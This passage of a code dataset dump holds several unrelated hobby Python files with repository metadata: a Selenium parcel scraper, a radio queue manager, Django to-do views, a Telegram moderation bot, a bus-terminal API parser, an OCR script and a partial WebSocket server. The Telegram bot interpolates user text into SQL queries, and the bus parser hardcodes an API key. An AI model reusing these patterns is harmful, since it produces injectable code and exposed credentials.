delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[1]/li[1]/span\").text\n time = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[1]/li[@class='route-date-time']/span\").text \n print({\"text\": text, \"time\": time})\n\n text = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[last()]/li[1]/span\").text\n time = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[last()]/li[@class='route-date-time']/span\").text \n print({\"text\": text, \"time\": time})\n print(\"打印完毕\")\n\nexcept TimeoutException as e:\n print(\"等待超时\")\n\nfinally:\n print(\"准备退出\")\n driver.quit()\n\n# time.sleep(10)\n\n# deliveries = driver.find_elements_by_xpath(\"//div[@class='delivery-wrapper']/div[@class='delivery']\")\n\n# for index, delivery in enumerate(deliveries):\n\n# bill_num = delivery.find_element_by_xpath(\".//div[@class='bill-num']/span[@class='number']\").text\n# print(\"===================={}、{}==================\".format(index + 1, bill_num))\n# print(bill_num)\n\n# text = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[1]/li[1]/span\").text\n# time = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[1]/li[@class='route-date-time']/span\").text \n# print({\"text\": text, \"time\": time})\n\n# text = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[last()]/li[1]/span\").text\n# time = delivery.find_element_by_xpath(\".//div[@class='route-list']/ul[last()]/li[@class='route-date-time']/span\").text \n# print({\"text\": text, \"time\": time})\n\n\n ", "repo_name": "incliff/scraping_shunfeng_order", "sub_path": "tmp/cut_text.py", "file_name": "cut_text.py", "file_ext": "py", "file_size_in_byte": 3229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 12, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 12, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_all_elements_located", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 44, "usage_type": "name"}]}
+{"seq_id": "5765803075", "text": "import json\nimport glob\nimport random\nimport numpy as np\nimport datetime\nimport time\nimport asyncio\n\n#print(\"test\")\n\nglobalPath = \"C:/Users/2sylv/Desktop/opdrachten programeren/IBS/\"\nlocalPath = \"InvictusRadio V3/\"\n\n# a few functions we need\ndef getNonLocalInfo(path):\n try:\n with open(path, 'r') as f:\n return json.load(f)\n except:\n print(\"WARNING! Info corrupted or missing.\")\n\ndef getManagerInfo():\n try:\n with open(globalPath + localPath + 'InvictusRadioInfo.json', 'r') as f:\n managerInfo = json.load(f)\n except:\n print(\"WARNING! Manager info corrupted or missing, default settings have been selected.\")\n managerInfo = {\"queueStyle\" : \"shuffle\", \"playlist\" : None, \"queue\": [], \"familiarityDictSongs\": {}, \"familiarityDictArtists\": {}, \"songStartTime\": datetime.datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")}\n return managerInfo\n\ndef setManagerInfo(managerInfo):\n with open(globalPath + localPath + 'InvictusRadioInfo.json', 'w') as f:\n json.dump(managerInfo, f)\n\ndef getPlaylistInfo(playlist):\n #Check if the playlist exists\n validPlaylist = {}\n spam = glob.glob(globalPath + \"InvictusRadio V3/audioDatabase/*/**/\", recursive=True)\n for egg in spam:\n validPlaylist[egg[egg[:-1].rfind(\"\\\\\")+1:-1]] = egg\n #print(validPlaylist.keys())\n\n if playlist == None:\n playlist = \"music\"\n elif playlist not in validPlaylist.keys():\n playlist = \"music\"\n print(\"WARNING! Selected play not avalible.\")\n\n #colecting relefant information\n playlistPath = validPlaylist[playlist]\n songLinks = glob.glob(playlistPath+\"**\\\\*.mp3\",recursive=True)\n numSongs = len(songLinks)\n return {\"playlistName\" : playlist, \"playlistPath\" : playlistPath, \"songLinks\" : songLinks, \"numSongs\" : numSongs}\n\ndef addSongQueueShuffle():\n \"\"\"\n Pick a random song but have a chance of picking another one if this song or artist is already played\n \"\"\"\n #these setting determine how the shuffle algorithm prefents song or artists not to be picked too often\n songPenalty = 10\n artistPenalty = 5\n penaltyDecay = 0.8\n\n\n #get familiarity dict to check if a song or artist is already played a lot\n managerInfo = getManagerInfo()\n try:\n familiarityDictSongs = managerInfo[\"familiarityDictSongs\"]\n except:\n familiarityDictSongs = {}\n try:\n familiarityDictArtists = managerInfo[\"familiarityDictArtists\"]\n except:\n familiarityDictArtists = {}\n\n\n #get playlist info\n playlistInfo = getPlaylistInfo(managerInfo[\"playlist\"])\n\n\n #this loop will repeat until it found a song that hasn't been played too much\n done = False\n i = 0\n while done == False and i <= 1000:\n #pick random song out of playlist and get song info\n suggestionLink = playlistInfo[\"songLinks\"][random.randint(0,playlistInfo[\"numSongs\"]-1)]\n try:\n with open(suggestionLink[:-4] + \".json\", 'r') as f:\n suggestionInfo = json.load(f)\n except:\n print(\"WARNING! Song info corrupted or missing, song is not added to queue.\\nLink to song: \" + suggestionLink)\n continue\n \n \n #check if we had this song or artist before and get familiarity score\n if suggestionInfo[\"songName\"] in familiarityDictSongs.keys():\n familiarityScoreSong = familiarityDictSongs[suggestionInfo[\"songName\"]]\n else:\n familiarityScoreSong = 0\n \n familiarityScoreArtist = 0\n for artist in [i for i in suggestionInfo[\"artists\"] if i in familiarityDictArtists.keys()]:\n familiarityScoreArtist = familiarityScoreArtist + familiarityDictArtists[artist]\n \n #if a song or artist has been played a lot it will be discriminated against\n discriminationOdds = np.e**((familiarityScoreSong + familiarityScoreArtist)*-1)\n \n if random.random() <= discriminationOdds:\n #add new song to queue\n managerInfo[\"queue\"].append({\"songName\": suggestionInfo[\"songName\"], \"songPath\": suggestionLink, \"songType\": \"song\"})\n \n #adjust the familiarity score so the song or artist is played less often in the future\n try:\n managerInfo[\"familiarityDictSongs\"][suggestionInfo[\"songName\"]] = managerInfo[\"familiarityDictSongs\"][suggestionInfo[\"songName\"]] + songPenalty\n except:\n managerInfo[\"familiarityDictSongs\"][suggestionInfo[\"songName\"]] = songPenalty\n for artist in suggestionInfo[\"artists\"]:\n #print(artist)\n try:\n managerInfo[\"familiarityDictArtists\"][artist] = managerInfo[\"familiarityDictArtists\"][artist] + artistPenalty\n except:\n managerInfo[\"familiarityDictArtists\"][artist] = artistPenalty\n\n #adjust the familiarity score so the song or artist is not discriminated against indevinately\n for song in managerInfo[\"familiarityDictSongs\"]:\n managerInfo[\"familiarityDictSongs\"][song] = managerInfo[\"familiarityDictSongs\"][song]*penaltyDecay\n for artist in managerInfo[\"familiarityDictArtists\"]:\n managerInfo[\"familiarityDictArtists\"][artist] = managerInfo[\"familiarityDictArtists\"][artist]*penaltyDecay \n\n done = True\n i = i + 1\n \n if done == False:\n managerInfo[\"queue\"].append({\"songName\": suggestionInfo[\"songName\"], \"songPath\": globalPath + \"InvictusRadio V3/audioDatabase/functional/manager warnings/too few songs to shuffle.mp3\", \"songType\": \"functional\"})\n #managerInfo[\"queuePaths\"].append(globalPath + \"InvictusRadio V3/audioDatabase/functional/manager warnings/too few songs to shuffle.mp3\")\n for song in managerInfo[\"familiarityDictSongs\"]:\n managerInfo[\"familiarityDictSongs\"][song] = managerInfo[\"familiarityDictSongs\"][song]*penaltyDecay\n for artist in managerInfo[\"familiarityDictArtists\"]:\n managerInfo[\"familiarityDictArtists\"][artist] = managerInfo[\"familiarityDictArtists\"][artist]*penaltyDecay \n setManagerInfo(managerInfo)\n\n\n\nmanagerInfo = getManagerInfo()\nsetManagerInfo(managerInfo)\naddSongQueueShuffle()\n#test = {'queueStyle': 'shuffle', 'playlist': 'test', 'queuePaths': ['C:/Users/2sylv/Desktop/opdrachten programeren/IBS/InvictusRadio V3/audioDatabase\\\\music\\\\test\\\\Crazy Frog+Axel F.mp3'], 'familiarityDictSongs': {'Crazy Frog': 8.0}, 'familiarityDictArtists': {'Axel F': 4.0}}\n#setManagerInfo(test)\n\n#onAir = datetime.datetime.now()\n#while onAir + datetime.timedelta(seconds=100) >= datetime.datetime.now():\ndef run():\n managerInfo = getManagerInfo()\n #make sure the queue is long enough\n if len(managerInfo[\"queue\"]) <= 5:\n if managerInfo[\"queueStyle\"] == \"shuffle\":\n addSongQueueShuffle()\n print(\"queue len: \" + str(len(managerInfo[\"queue\"])))\n print(\"queue extended!\")\n managerInfo = getManagerInfo()\n\n #remove song from queue when done\n if managerInfo[\"queue\"][0][\"songType\"] == \"song\":\n currentSongInfo = getNonLocalInfo(managerInfo[\"queue\"][0][\"songPath\"][:-4]+\".json\")\n if datetime.datetime.strptime(managerInfo[\"songStartTime\"], \"%m/%d/%Y, %H:%M:%S\") + datetime.timedelta(seconds=currentSongInfo[\"duration\"]) <= datetime.datetime.now():\n managerInfo[\"queue\"] = managerInfo[\"queue\"][1:]\n managerInfo[\"songStartTime\"] = datetime.datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n setManagerInfo(managerInfo)\n print(\"queue len: \" + str(len(managerInfo[\"queue\"])))\n print(\"song deleted\")\n \n #make sure the queue is long enough\n if len(managerInfo[\"queue\"]) <= 4:\n if managerInfo[\"queueStyle\"] == \"shuffle\":\n addSongQueueShuffle()\n print(\"queue len: \" + str(len(managerInfo[\"queue\"])))\n print(\"queue extended!\")\n\n\n\n #print(\"yay\")\n #time.sleep(1)\n #asyncio.sleep(1)", "repo_name": "ODDInvictus/InvictusRadio", "sub_path": "InvictusRadio Manager.py", "file_name": "InvictusRadio Manager.py", "file_ext": "py", "file_size_in_byte": 8016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 33, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 38, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 51, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 86, "usage_type": "call"}, {"api_name": "json.load", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.e", "line_number": 106, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 165, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 165, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 165, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 165, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 167, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 167, "usage_type": "attribute"}]}
+{"seq_id": "34428500894", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Item\nfrom .forms import ListForm\nfrom django.contrib import messages\n\nimport requests\n\n# Create your views here.\n\n\ndef create_view(request):\n form = ListForm(request.POST or None)\n context = {}\n context[\"form\"] = form\n if form.is_valid():\n form.save()\n all_items = Item.objects.all\n return render(request, \"index.html\", context)\n\n\ndef view_list(request):\n context = {}\n context[\"dataset\"] = Item.objects.all()\n\n return render(request, \"viewlist.html\", context)\n\n\ndef delete_item(request, list_id):\n item = Item.objects.get(pk=list_id)\n item.delete()\n return redirect(\"/todolist/viewlist\")\n\n\ndef edit_item(request, list_id):\n context = {}\n item = Item.objects.get(pk=list_id)\n context[\"dataset\"] = Item.objects.get(pk=list_id)\n if item.status == \"COMPLETE\":\n item.staus = \"INCOMPLETE\"\n elif item.status == \"INCOMPLETE\":\n item.status = \"COMPLETE\"\n item.save()\n return render(request, \"editlist.html\", context)\n\n\ndef edited(request, list_id):\n context = {}\n item = get_object_or_404(Item, pk=list_id)\n form = ListForm(request.POST or None, instance=Item)\n name = request.GET.get(\"id\")\n print(\"form : \", form)\n print(\"name : \", name)\n print(\"req : \", request.POST)\n item.save()\n print(context)\n context[\"dataset\"] = Item.objects.all()\n return render(request, \"viewlist.html\", context)\n", "repo_name": "HassaanMahboob1/DjangoTodoList", "sub_path": "ToDoList/List/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1481, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "forms.ListForm", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Item.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Item.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 29, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Item.objects.get", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Item.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 48, "usage_type": "argument"}, {"api_name": "forms.ListForm", "line_number": 49, "usage_type": "call"}, {"api_name": "models.Item", "line_number": 49, "usage_type": "name"}, {"api_name": "models.Item.objects.all", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 56, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "42463808051", "text": "from typing import Type\r\nfrom main import *\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\nimport config\r\n\r\n\"\"\"Закреп сообщения\"\"\"\r\n@dp.message_handler(commands=['pin'])\r\nasync def pin(message: types.Message):\r\n member = await bot.get_chat_member(message.chat.id, message.from_user.id)\r\n \r\n if member.is_chat_admin() != True:\r\n await message.answer(\"У вас нет прав для этого действия\")\r\n else:\r\n txt = message.text.replace(\"/pin \", \"\")\r\n await message.pin(disable_notification=True)\r\n\r\n\r\n\r\n\r\n\"\"\"Добавление запрещённого слова\"\"\"\r\n@dp.message_handler(commands=['banword'])\r\nasync def newBanWord(message: types.Message):\r\n member = await bot.get_chat_member(message.chat.id, message.from_user.id)\r\n\r\n if member.is_chat_admin() != True:\r\n await message.answer(\"У вас нет прав для этого действия\")\r\n else:\r\n word = message.text.replace(\"/banword \", \"\")\r\n cursor.execute(f\"\"\"INSERT INTO banWords\r\n VALUES ('{word}')\"\"\"\r\n )\r\n conn.commit()\r\n await message.answer(\"Слово `\" + word + \"' добавлено в чёрный список\")\r\n\r\n\r\n\r\n\r\n\"\"\"Добавления юзера в белый список\"\"\"\r\n@dp.message_handler(commands=['notdel'])\r\nasync def notban(message: types.Message):\r\n member = await bot.get_chat_member(message.chat.id, message.from_user.id)\r\n\r\n if member.is_chat_admin() != True:\r\n await message.answer(\"У вас нет прав для этого действия\")\r\n else:\r\n config.notBanned.append(message.text.replace(\"/notdel \", \"\").replace(\"@\", \"\"))\r\n await message.answer(\"У пользователя '\" + message.text.replace(\"/notdel \", \"\").replace(\"@\", \"\") + \"' не будут удаляться запрещённые сообщения\")\r\n\r\n\r\n\r\n\"\"\"Очистка сообщений по слову\"\"\"\r\n@dp.message_handler(commands=['delword'])\r\nasync def delword(message: types.Message):\r\n member = await bot.get_chat_member(message.chat.id, message.from_user.id)\r\n \r\n if member.is_chat_admin() != True:\r\n await message.answer(\"У вас нет прав для этого действия\")\r\n \r\n else:\r\n word = message.text.replace('/delword ', \"\").lower()\r\n\r\n await message.answer(\"Слово '\" + word + \"' добавлено в чёрный список и сообщения, включающие это слово удалены\")\r\n\r\n cursor.execute(f\"\"\"INSERT INTO banWords\r\n VALUES ('{word}')\"\"\"\r\n )\r\n conn.commit()\r\n\r\n sql = f\"SELECT * FROM messages WHERE text LIKE '%{word}%'\"\r\n cursor.execute(sql)\r\n messages = cursor.fetchall()\r\n\r\n for msg in messages:\r\n print(msg)\r\n await bot.delete_message(msg[0], msg[1])\r\n\r\n\r\n\r\n@dp.message_handler(commands=['ban'])\r\nasync def ban(message: types.Message):\r\n banned = message.reply_to_message.from_user.id\r\n config.banned.append(banned)\r\n await bot.ban_chat_member(message.chat.id, banned)\r\n await message.answer(\"Пользователь '\" + str(message.reply_to_message.from_user.username) + \"' идёт нахуй навсегда\")\r\n\r\n\r\n\r\n@dp.message_handler()\r\nasync def lol(message: types.Message):\r\n word = message.text.split(' ')\r\n member = message.from_user.id\r\n \r\n if member in config.banned:\r\n await bot.ban_chat_member(message.chat.id, member)\r\n \r\n for w in word:\r\n sql = f\"SELECT * FROM banWords WHERE word LIKE '%{w}%'\"\r\n cursor.execute(sql)\r\n messages = cursor.fetchone()\r\n print(messages)\r\n if messages:\r\n if(message.from_user.username in config.notBanned):\r\n pass\r\n else:\r\n if(w == messages[0]):\r\n await message.delete()\r\n else:\r\n pass\r\n else:\r\n cursor.execute(f\"\"\"INSERT INTO messages\r\n VALUES ({message.chat.id}, {message.message_id}, '{message.text.lower()}')\"\"\"\r\n )\r\n conn.commit()\r\n\r\n\r\n@dp.message_handler(content_types = ['new_chat_members', 'left_chat_member'])\r\nasync def delete(message: types.Message):\r\n members = message.new_chat_members\r\n for mem in members:\r\n if mem.id in config.banned:\r\n await bot.ban_chat_member(message.chat.id, mem.id)\r\n await message.delete()", "repo_name": "Uroniq-git/tg-bot-7", "sub_path": "Telegram bot #7/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 4525, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aiogram.types.Message", "line_number": 8, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 8, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 22, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 22, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 40, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 40, "usage_type": "name"}, {"api_name": "config.notBanned.append", "line_number": 46, "usage_type": "call"}, {"api_name": "config.notBanned", "line_number": 46, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 53, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 53, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 80, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 80, "usage_type": "name"}, {"api_name": "config.banned.append", "line_number": 82, "usage_type": "call"}, {"api_name": "config.banned", "line_number": 82, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 89, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 89, "usage_type": "name"}, {"api_name": "config.banned", "line_number": 93, "usage_type": "attribute"}, {"api_name": "config.notBanned", "line_number": 102, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 117, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 117, "usage_type": "name"}, {"api_name": "config.banned", "line_number": 120, "usage_type": "attribute"}]}
+{"seq_id": "34986775510", "text": "import json\nfrom urllib import parse, request\nfrom ptuBusCrawling.Crawler.Util.SendSlcakMsg import SendSlackMeg\nfrom ptuBusServer.Models import BusTerminalModel\nimport sys\n\n\nclass BusTerminalParsing:\n def __init__(self, CID=\"1220\"):\n apiKey = \"mxl46U1g52x6aVOUX/p969Zbtq9EZmboho4Jp5WiUlQ\"\n self.url = [\n {\n \"url\": \"https://api.odsay.com/v1/api/intercityBusTerminals?\",\n \"isExpress\": 0,\n },\n {\n \"url\": \"https://api.odsay.com/v1/api/expressBusTerminals?\",\n \"isExpress\": 1,\n },\n ]\n self.query = [(\"apiKey\", apiKey), (\"CID\", CID)]\n self.msg = SendSlackMeg()\n\n def makeURL(self, url):\n return url + parse.urlencode(self.query, encoding=\"UTF-8\", doseq=True)\n\n def openURL(self, url):\n url = self.makeURL(url)\n request_url = request.Request(url)\n response = request.urlopen(request_url)\n return response.read().decode(\"utf-8\")\n\n def checkError(self, data):\n if (\"error\" in data) == True:\n code = data[\"error\"][0][\"code\"]\n message = data[\"error\"][0][\"message\"]\n error_status = \"code : \" + code + \"\\nmessage : \" + message\n print(error_status)\n self.msg.sendMsg(error_status)\n sys.exit()\n elif not data[\"result\"]:\n code = \"-8\"\n message = \"필수 입력 값 형식 및 범위 오류\"\n error_status = \"code : \" + code + \"\\nmessage : \" + message\n print(error_status)\n self.msg.sendMsg(error_status)\n sys.exit()\n else:\n return data\n\n def parsing(self):\n count = 1\n for Type in self.url:\n data = self.openURL(Type[\"url\"])\n rDD = self.checkError(json.loads(data))\n isExpress = Type[\"isExpress\"]\n t = rDD[\"result\"]\n for i in range(len(t)):\n if (\n rDD[\"result\"][i][\"stationName\"] == \"평택시외버스터미널\"\n or rDD[\"result\"][i][\"stationName\"] == \"평택고속버스터미널\"\n ):\n startStationID = rDD[\"result\"][i][\"stationID\"]\n startStationName = rDD[\"result\"][i][\"stationName\"]\n results = rDD[\"result\"][i][\"destinationTerminals\"]\n for result in results:\n endStationName = result[\"stationName\"]\n BusTerminalModel(\n id=count,\n startStationName=startStationName,\n startStationID=startStationID,\n endStationName=endStationName[\n endStationName.find(\"/\") + 1 :\n ],\n endStationID=result[\"stationID\"],\n isExpress=int(isExpress),\n ).save()\n count += 1\n\n\nif __name__ == \"__main__\":\n print(BusTerminalParsing().parsing())\n", "repo_name": "ptuBus/ptuBus_Server", "sub_path": "ptuBusCrawling/Crawler/Bus/BusTerminalParsing.py", "file_name": "BusTerminalParsing.py", "file_ext": "py", "file_size_in_byte": 3083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "ptuBusCrawling.Crawler.Util.SendSlcakMsg.SendSlackMeg", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 25, "usage_type": "name"}, {"api_name": "urllib.request.Request", "line_number": 29, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 29, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 30, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 30, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 47, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 55, "usage_type": "call"}, {"api_name": "ptuBusServer.Models.BusTerminalModel", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "36791652530", "text": "import json\nimport base64\nfrom tencentcloud.common import credential\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\nfrom tencentcloud.ocr.v20181119 import ocr_client, models\n\ndef ToBase64(file):\n with open(file,'rb') as fileObj:\n audio_data = fileObj.read()\n base64_data = base64.b64encode(audio_data)\n result = base64_data.decode()\n return result\n\n# 从文件读取秘钥\ndef getSecret(Path):\n file = open(Path,'r')\n ID = file.readline().strip()\n Key = file.readline()\n file.close()\n return ID,Key\n\nsecretPath = \"./CloudKey.txt\"\nSecretID, SecretKey = getSecret(secretPath)\n\nimport json\nfrom tencentcloud.common import credential\nfrom tencentcloud.common.profile.client_profile import ClientProfile\nfrom tencentcloud.common.profile.http_profile import HttpProfile\nfrom tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException\nfrom tencentcloud.ocr.v20181119 import ocr_client, models\n\ndef run(file64):\n try:\n # 实例化一个认证对象,入参需要传入腾讯云账户 SecretId 和 SecretKey,此处还需注意密钥对的保密\n # 代码泄露可能会导致 SecretId 和 SecretKey 泄露,并威胁账号下所有资源的安全性。以下代码示例仅供参考,建议采用更安全的方式来使用密钥,请参见:https://cloud.tencent.com/document/product/1278/85305\n # 密钥可前往官网控制台 https://console.cloud.tencent.com/cam/capi 进行获取\n cred = credential.Credential(SecretID, SecretKey)\n # 实例化一个http选项,可选的,没有特殊需求可以跳过\n httpProfile = HttpProfile()\n httpProfile.endpoint = \"ocr.tencentcloudapi.com\"\n\n # 实例化一个client选项,可选的,没有特殊需求可以跳过\n clientProfile = ClientProfile()\n clientProfile.httpProfile = httpProfile\n # 实例化要请求产品的client对象,clientProfile是可选的\n client = ocr_client.OcrClient(cred, \"ap-beijing\", clientProfile)\n\n # 实例化一个请求对象,每个接口都会对应一个request对象\n req = models.GeneralFastOCRRequest()\n params = {\n \"ImageBase64\":file64\n }\n req.from_json_string(json.dumps(params))\n\n # 返回的resp是一个GeneralFastOCRResponse的实例,与请求对象对应\n resp = client.GeneralFastOCR(req)\n # 输出json格式的字符串回包\n print(resp.to_json_string())\n resultString = resp.to_json_string()\n resultDict = json.loads(resultString)\n content = ''\n for i in resultDict['TextDetections']:\n temp = i['DetectedText']\n content = content+ temp\n print(content)\n fout = open(\"./res.txt\",'w')\n fout.write(content+\"\\n\")\n fout.close()\n \n\n except TencentCloudSDKException as err:\n print(err)\n\nfile = \"./ocrTarget.jpg\"\n\nfile64 = ToBase64(file)\nrun(file64)\n", "repo_name": "DeanZhong912/SGSEliminate", "sub_path": "testOCR.py", "file_name": "testOCR.py", "file_ext": "py", "file_size_in_byte": 3150, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "base64.b64encode", "line_number": 12, "usage_type": "call"}, {"api_name": "tencentcloud.common.credential.Credential", "line_number": 39, "usage_type": "call"}, {"api_name": "tencentcloud.common.credential", "line_number": 39, "usage_type": "name"}, {"api_name": "tencentcloud.common.profile.http_profile.HttpProfile", "line_number": 41, "usage_type": "call"}, {"api_name": "tencentcloud.common.profile.client_profile.ClientProfile", "line_number": 45, "usage_type": "call"}, {"api_name": "tencentcloud.ocr.v20181119.ocr_client.OcrClient", "line_number": 48, "usage_type": "call"}, {"api_name": "tencentcloud.ocr.v20181119.ocr_client", "line_number": 48, "usage_type": "name"}, {"api_name": "tencentcloud.ocr.v20181119.models.GeneralFastOCRRequest", "line_number": 51, "usage_type": "call"}, {"api_name": "tencentcloud.ocr.v20181119.models", "line_number": 51, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "tencentcloud.common.exception.tencent_cloud_sdk_exception.TencentCloudSDKException", "line_number": 73, "usage_type": "name"}]}
+{"seq_id": "20709788730", "text": "import base64\nimport hashlib\nimport re\nimport socketserver\n\n\ndef make_payload(data: bytes):\n payload = bytearray([0, 0])\n payload[0] = 0b10000001 # setting op code to 0x1 and fin to 1\n payload[1] = len(data) & 0b01111111 # setting mask to 0\n return bytes(payload) + data\n\n\nclass Payload:\n FIN = 0b0 # 1 bit\n RSV1, RSV2, RSV3 = 0b0, 0b0, 0b0 # 3 bits - will be set to 0 since no extensions negotiated\n OPCODE = 0b0000 # 4 bits\n MASK = 0b0 # 1 bit\n PAYLOAD_LENGTH = 0b0000000 # 7 bits, Note: assuming length to be between 0-125\n MASKING_KEY = 0 # 4 bytes if masking bit = 1 else 0 bytes\n PAYLOAD_DATA = None # x+y bytes (assuming no extension data provided so x=0)\n\n def __init__(self, payload: bytes):\n self.payload = payload\n self.data = self.break_payload()\n\n def break_payload(self):\n OP_FIN = self.payload[0] # first byte contains FIN/RSV values and the opcode\n self.FIN = OP_FIN >> 7\n self.OPCODE = OP_FIN & 0b00001111\n\n MASK_AND_PAYLOAD_LENGTH = self.payload[1]\n self.MASK = MASK_AND_PAYLOAD_LENGTH >> 7\n self.PAYLOAD_LENGTH = MASK_AND_PAYLOAD_LENGTH & 0b01111111\n if self.MASK:\n self.MASKING_KEY = self.payload[2:6]\n self.PAYLOAD_DATA = self.payload[6:]\n else:\n self.PAYLOAD_DATA = self.payload[2:]\n unmasked = bytearray()\n for i in range(self.PAYLOAD_LENGTH):\n unmasked.append(self.PAYLOAD_DATA[i] ^ self.MASKING_KEY[i % 4])\n\n return unmasked\n\n def __str__(self):\n return str(self.data)\n\n\ndef make_headers(headers: dict):\n result = \"\"\n result += \"HTTP/1.1 101 Switching Protocols\\r\\n\"\n for header, value in headers.items():\n result += f\"{header}: {value}\\r\\n\"\n return result + '\\r\\n'\n\n\ndef get_key(handshake_string):\n key = re.findall(r\"Sec-WebSocket-Key: .*\", handshake_string)[0]\n key = key.split(\":\")[1].strip()\n return key\n\n\nclass Handler(socketserver.BaseRequestHandler):\n MAGIC = \"258EAFA5-E914-47DA-95CA-C5AB0DC85B11\"\n\n def handshake(self) -> None:\n handshake_text = self.request.recv(1024).decode('utf-8')\n print(handshake_text)\n key = 